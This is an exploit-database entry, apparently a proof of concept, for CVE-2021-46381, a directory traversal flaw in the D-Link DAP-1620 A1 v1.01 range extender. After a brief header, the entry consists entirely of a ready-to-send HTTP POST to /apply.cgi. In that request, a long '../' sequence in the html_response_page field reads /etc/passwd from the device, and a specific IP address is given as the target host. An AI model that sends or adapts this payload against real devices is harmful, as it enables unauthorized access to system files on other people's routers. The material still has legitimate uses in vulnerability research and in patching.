# Exploit Title: DLINK DAP-1620 A1 v1.01 - Directory Traversal # Date: 27/4/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://me.dlink.com/consumer # Version: DAP-1620 - A1 v1.01 # Tested on: Linux # CVE : CVE-2021-46381 POST /apply.cgi HTTP/1.1 Content-Type: application/x-www-form-urlencoded Referer: http://84.217.16.220/ Cookie: ID=634855649 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br Content-Length: 281 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 Host: 84.217.16.220 Connection: Keep-alive action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass